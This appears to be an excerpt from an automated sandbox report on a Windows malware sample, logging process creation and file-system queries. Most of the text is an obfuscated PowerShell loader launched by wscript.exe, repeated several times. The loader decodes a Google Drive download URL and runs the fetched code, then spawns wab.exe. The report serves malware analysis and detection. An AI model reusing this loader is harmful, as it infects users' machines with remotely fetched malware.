Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$unbumped = 1;$svveflyvers='substrin';$svveflyvers+='g';function disken($sthamrenes){$hotelvrelserne=$sthamrenes.length-$unbumped;for($acned=5; $acned -lt $hotelvrelserne; $acned+=(6)){$professorships+=$sthamrenes.$svveflyvers.invoke($acned, $unbumped);}$professorships;}function jots($misagent){& ($jargonens) ($misagent);}$orthoarsenite=disken 'dyrenm.agisofornozspasmi gammlcomplljordsaint,a/ proa5gaest.anu y0slibr ,ters(underwtulwailyshanfa eldindsyostrmpw snebsc.lam indtngu.nat tabu balan1docum0cowsh. obl,0reap.; ti.l xorinwcatacifusi,nroya 6bijug4cr.ck;efter reaffxbalsa6 va,b4.arco;efter ,andlr sek.vmilit: nint1fremk2beiji1bl,nk.uncre0 hard) albr a,tneg ga.se sl.dc s.inkundero argo/kazat2banka0outs,1impra0reson0unapp1bille0pikke1eleme rveskf mothitjenerunma,epriapfk.emto anpaxactiv/ufo,d1 iru2pizzl1tetra.a,opt0coun ';$orlops=disken 'clauduphrensindhaedrejerfolk.-ru,dra carpghkasse unwan relatsuffu ';$horrify=disken 'r,nsehespaltinodot.ranoprent.sfe.ie:,rage/ kast/semicdopfrsrtel,diflydevhazieespeck.nickeg dtro bndso drieghansilas.emetradu..asshcbdet.ounprampilus/le.oruspinncnon.i? filiefyrsvxspellpcam.sofragmrtilbatsocia=attacdpouncobjergwdekorn.nterlugekootalmsagastrdc,pry&justiivolumdl,tsv=uds,y1 cyliui.rigj istoh indilsognemlnninuprveu_ lakubriksyuncon5mangejamtsr0 ga.ettropiulathevhackehrail,xo,phasoologbskovtnmesse0 johnginsemftvivl5 bespxantiacbidrac,untsloestrqsc.mmumayorn ze.efracem ';$cachinnate=disken 'swine> kumy ';$jargonens=disken 'unp.uico.tre d.ngx aggr ';$pessimistisk='blanketten';jots (disken 'predrsinfuse pr,ntsalgs-co ticdiffeointelnpaa lt stboe envanklaphtkva m tilbr-redobpop,avaun,xptchlorh urr er gstforsl:homet\ impabklag,a contdflet.nkr,gsioverdnafrunguni.ie isoprdesia.actustduplixudstyttiltu ly.u-firehvmidshafl,kel.kspoubortkeembry noto$ resupunblieep,stsnoncosmven igarewmilldiidra,ts artitpedomism lss hypokpe,fe;folke ');jots (disken 'vacatibekenf stin inhal( lym toenoleaplodsgonertu.end-noy npeata.a,ngentkommuhchart juict rigs:tokom\c.urib jenkainfardnobilnfor.oifininnaabengaffa eclairr nonr.age.tt til,x,iktotunbla)ova o{hundee nstmxfor oi onant ,xsa}aand.;tr,ld ');$monotonises = disken 'madolebuzzwcplaceh tromosmede affil% otaacurcip chrop bre,dbestta sidetprincalegwo%,anke\dyppekkvg.elafkoravoldspcotanj krisaunloqgspareth,alpeproc.rkeesdserita.datapsdisple radap er,v thomi& linj&forko al.nefalusc hydrhchiliodetru exone$rekur ';jots (disken ' icho$al rmgsalgsl ekliokonnibselfsaafs.alde.om:frnvnsc ianyfac.dnstubbk le tr alumois.denforhismi levbromombeboen hngsichefknpseudgforsms menu=fr ki(catticskabnmsierrdvr.ma .rusk/outstc laic virtu$,roximst,afo pocn uryosjleat scylo fi.knagurkifiberstresaea.tifsc cre)mes.n ');jots (disken 'sleke$skrkpgquatel,koleohairmbtrotta allulkulka: emorpsemitadogslrunthraopfrsdunderruforrobaadeptiptap,isfoibemusn hebdgud ad=refam$ freuhfjendo newlrvinker b
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$unbumped = 1;$svveflyvers='substrin';$svveflyvers+='g';function disken($sthamrenes){$hotelvrelserne=$sthamrenes.length-$unbumped;for($acned=5; $acned -lt $hotelvrelserne; $acned+=(6)){$professorships+=$sthamrenes.$svveflyvers.invoke($acned, $unbumped);}$professorships;}function jots($misagent){& ($jargonens) ($misagent);}$orthoarsenite=disken 'dyrenm.agisofornozspasmi gammlcomplljordsaint,a/ proa5gaest.anu y0slibr ,ters(underwtulwailyshanfa eldindsyostrmpw snebsc.lam indtngu.nat tabu balan1docum0cowsh. obl,0reap.; ti.l xorinwcatacifusi,nroya 6bijug4cr.ck;efter reaffxbalsa6 va,b4.arco;efter ,andlr sek.vmilit: nint1fremk2beiji1bl,nk.uncre0 hard) albr a,tneg ga.se sl.dc s.inkundero argo/kazat2banka0outs,1impra0reson0unapp1bille0pikke1eleme rveskf mothitjenerunma,epriapfk.emto anpaxactiv/ufo,d1 iru2pizzl1tetra.a,opt0coun ';$orlops=disken 'clauduphrensindhaedrejerfolk.-ru,dra carpghkasse unwan relatsuffu ';$horrify=disken 'r,nsehespaltinodot.ranoprent.sfe.ie:,rage/ kast/semicdopfrsrtel,diflydevhazieespeck.nickeg dtro bndso drieghansilas.emetradu..asshcbdet.ounprampilus/le.oruspinncnon.i? filiefyrsvxspellpcam.sofragmrtilbatsocia=attacdpouncobjergwdekorn.nterlugekootalmsagastrdc,pry&justiivolumdl,tsv=uds,y1 cyliui.rigj istoh indilsognemlnninuprveu_ lakubriksyuncon5mangejamtsr0 ga.ettropiulathevhackehrail,xo,phasoologbskovtnmesse0 johnginsemftvivl5 bespxantiacbidrac,untsloestrqsc.mmumayorn ze.efracem ';$cachinnate=disken 'swine> kumy ';$jargonens=disken 'unp.uico.tre d.ngx aggr ';$pessimistisk='blanketten';jots (disken 'predrsinfuse pr,ntsalgs-co ticdiffeointelnpaa lt stboe envanklaphtkva m tilbr-redobpop,avaun,xptchlorh urr er gstforsl:homet\ impabklag,a contdflet.nkr,gsioverdnafrunguni.ie isoprdesia.actustduplixudstyttiltu ly.u-firehvmidshafl,kel.kspoubortkeembry noto$ resupunblieep,stsnoncosmven igarewmilldiidra,ts artitpedomism lss hypokpe,fe;folke ');jots (disken 'vacatibekenf stin inhal( lym toenoleaplodsgonertu.end-noy npeata.a,ngentkommuhchart juict rigs:tokom\c.urib jenkainfardnobilnfor.oifininnaabengaffa eclairr nonr.age.tt til,x,iktotunbla)ova o{hundee nstmxfor oi onant ,xsa}aand.;tr,ld ');$monotonises = disken 'madolebuzzwcplaceh tromosmede affil% otaacurcip chrop bre,dbestta sidetprincalegwo%,anke\dyppekkvg.elafkoravoldspcotanj krisaunloqgspareth,alpeproc.rkeesdserita.datapsdisple radap er,v thomi& linj&forko al.nefalusc hydrhchiliodetru exone$rekur ';jots (disken ' icho$al rmgsalgsl ekliokonnibselfsaafs.alde.om:frnvnsc ianyfac.dnstubbk le tr alumois.denforhismi levbromombeboen hngsichefknpseudgforsms menu=fr ki(catticskabnmsierrdvr.ma .rusk/outstc laic virtu$,roximst,afo pocn uryosjleat scylo fi.knagurkifiberstresaea.tifsc cre)mes.n ');jots (disken 'sleke$skrkpgquatel,koleohairmbtrotta allulkulka: emorpsemitadogslrunthraopfrsdunderruforrobaadeptiptap,isfoibemusn hebdgud ad=refam$ freuhfjendo newlrvinker b
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$unbumped = 1;$svveflyvers='substrin';$svveflyvers+='g';function disken($sthamrenes){$hotelvrelserne=$sthamrenes.length-$unbumped;for($acned=5; $acned -lt $hotelvrelserne; $acned+=(6)){$professorships+=$sthamrenes.$svveflyvers.invoke($acned, $unbumped);}$professorships;}function jots($misagent){& ($jargonens) ($misagent);}$orthoarsenite=disken 'dyrenm.agisofornozspasmi gammlcomplljordsaint,a/ proa5gaest.anu y0slibr ,ters(underwtulwailyshanfa eldindsyostrmpw snebsc.lam indtngu.nat tabu balan1docum0cowsh. obl,0reap.; ti.l xorinwcatacifusi,nroya 6bijug4cr.ck;efter reaffxbalsa6 va,b4.arco;efter ,andlr sek.vmilit: nint1fremk2beiji1bl,nk.uncre0 hard) albr a,tneg ga.se sl.dc s.inkundero argo/kazat2banka0outs,1impra0reson0unapp1bille0pikke1eleme rveskf mothitjenerunma,epriapfk.emto anpaxactiv/ufo,d1 iru2pizzl1tetra.a,opt0coun ';$orlops=disken 'clauduphrensindhaedrejerfolk.-ru,dra carpghkasse unwan relatsuffu ';$horrify=disken 'r,nsehespaltinodot.ranoprent.sfe.ie:,rage/ kast/semicdopfrsrtel,diflydevhazieespeck.nickeg dtro bndso drieghansilas.emetradu..asshcbdet.ounprampilus/le.oruspinncnon.i? filiefyrsvxspellpcam.sofragmrtilbatsocia=attacdpouncobjergwdekorn.nterlugekootalmsagastrdc,pry&justiivolumdl,tsv=uds,y1 cyliui.rigj istoh indilsognemlnninuprveu_ lakubriksyuncon5mangejamtsr0 ga.ettropiulathevhackehrail,xo,phasoologbskovtnmesse0 johnginsemftvivl5 bespxantiacbidrac,untsloestrqsc.mmumayorn ze.efracem ';$cachinnate=disken 'swine> kumy ';$jargonens=disken 'unp.uico.tre d.ngx aggr ';$pessimistisk='blanketten';jots (disken 'predrsinfuse pr,ntsalgs-co ticdiffeointelnpaa lt stboe envanklaphtkva m tilbr-redobpop,avaun,xptchlorh urr er gstforsl:homet\ impabklag,a contdflet.nkr,gsioverdnafrunguni.ie isoprdesia.actustduplixudstyttiltu ly.u-firehvmidshafl,kel.kspoubortkeembry noto$ resupunblieep,stsnoncosmven igarewmilldiidra,ts artitpedomism lss hypokpe,fe;folke ');jots (disken 'vacatibekenf stin inhal( lym toenoleaplodsgonertu.end-noy npeata.a,ngentkommuhchart juict rigs:tokom\c.urib jenkainfardnobilnfor.oifininnaabengaffa eclairr nonr.age.tt til,x,iktotunbla)ova o{hundee nstmxfor oi onant ,xsa}aand.;tr,ld ');$monotonises = disken 'madolebuzzwcplaceh tromosmede affil% otaacurcip chrop bre,dbestta sidetprincalegwo%,anke\dyppekkvg.elafkoravoldspcotanj krisaunloqgspareth,alpeproc.rkeesdserita.datapsdisple radap er,v thomi& linj&forko al.nefalusc hydrhchiliodetru exone$rekur ';jots (disken ' icho$al rmgsalgsl ekliokonnibselfsaafs.alde.om:frnvnsc ianyfac.dnstubbk le tr alumois.denforhismi levbromombeboen hngsichefknpseudgforsms menu=fr ki(catticskabnmsierrdvr.ma .rusk/outstc laic virtu$,roximst,afo pocn uryosjleat scylo fi.knagurkifiberstresaea.tifsc cre)mes.n ');jots (disken 'sleke$skrkpgquatel,koleohairmbtrotta allulkulka: emorpsemitadogslrunthraopfrsdunderruforrobaadeptiptap,isfoibemusn hebdgud ad=refam$ freuhfjendo newlrvinker b Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$unbumped = 1;$svveflyvers='substrin';$svveflyvers+='g';function disken($sthamrenes){$hotelvrelserne=$sthamrenes.length-$unbumped;for($acned=5; $acned -lt $hotelvrelserne; $acned+=(6)){$professorships+=$sthamrenes.$svveflyvers.invoke($acned, $unbumped);}$professorships;}function jots($misagent){& ($jargonens) ($misagent);}$orthoarsenite=disken 'dyrenm.agisofornozspasmi gammlcomplljordsaint,a/ proa5gaest.anu y0slibr ,ters(underwtulwailyshanfa eldindsyostrmpw snebsc.lam indtngu.nat tabu balan1docum0cowsh. obl,0reap.; ti.l xorinwcatacifusi,nroya 6bijug4cr.ck;efter reaffxbalsa6 va,b4.arco;efter ,andlr sek.vmilit: nint1fremk2beiji1bl,nk.uncre0 hard) albr a,tneg ga.se sl.dc s.inkundero argo/kazat2banka0outs,1impra0reson0unapp1bille0pikke1eleme rveskf mothitjenerunma,epriapfk.emto anpaxactiv/ufo,d1 iru2pizzl1tetra.a,opt0coun ';$orlops=disken 'clauduphrensindhaedrejerfolk.-ru,dra carpghkasse unwan relatsuffu ';$horrify=disken 'r,nsehespaltinodot.ranoprent.sfe.ie:,rage/ kast/semicdopfrsrtel,diflydevhazieespeck.nickeg dtro bndso drieghansilas.emetradu..asshcbdet.ounprampilus/le.oruspinncnon.i? filiefyrsvxspellpcam.sofragmrtilbatsocia=attacdpouncobjergwdekorn.nterlugekootalmsagastrdc,pry&justiivolumdl,tsv=uds,y1 cyliui.rigj istoh indilsognemlnninuprveu_ lakubriksyuncon5mangejamtsr0 ga.ettropiulathevhackehrail,xo,phasoologbskovtnmesse0 johnginsemftvivl5 bespxantiacbidrac,untsloestrqsc.mmumayorn ze.efracem ';$cachinnate=disken 'swine> kumy ';$jargonens=disken 'unp.uico.tre d.ngx aggr ';$pessimistisk='blanketten';jots (disken 'predrsinfuse pr,ntsalgs-co ticdiffeointelnpaa lt stboe envanklaphtkva m tilbr-redobpop,avaun,xptchlorh urr er gstforsl:homet\ impabklag,a contdflet.nkr,gsioverdnafrunguni.ie isoprdesia.actustduplixudstyttiltu ly.u-firehvmidshafl,kel.kspoubortkeembry noto$ resupunblieep,stsnoncosmven igarewmilldiidra,ts artitpedomism lss hypokpe,fe;folke ');jots (disken 'vacatibekenf stin inhal( lym toenoleaplodsgonertu.end-noy npeata.a,ngentkommuhchart juict rigs:tokom\c.urib jenkainfardnobilnfor.oifininnaabengaffa eclairr nonr.age.tt til,x,iktotunbla)ova o{hundee nstmxfor oi onant ,xsa}aand.;tr,ld ');$monotonises = disken 'madolebuzzwcplaceh tromosmede affil% otaacurcip chrop bre,dbestta sidetprincalegwo%,anke\dyppekkvg.elafkoravoldspcotanj krisaunloqgspareth,alpeproc.rkeesdserita.datapsdisple radap er,v thomi& linj&forko al.nefalusc hydrhchiliodetru exone$rekur ';jots (disken ' icho$al rmgsalgsl ekliokonnibselfsaafs.alde.om:frnvnsc ianyfac.dnstubbk le tr alumois.denforhismi levbromombeboen hngsichefknpseudgforsms menu=fr ki(catticskabnmsierrdvr.ma .rusk/outstc laic virtu$,roximst,afo pocn uryosjleat scylo fi.knagurkifiberstresaea.tifsc cre)mes.n ');jots (disken 'sleke$skrkpgquatel,koleohairmbtrotta allulkulka: emorpsemitadogslrunthraopfrsdunderruforrobaadeptiptap,isfoibemusn hebdgud ad=refam$ freuhfjendo newlrvinker b Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
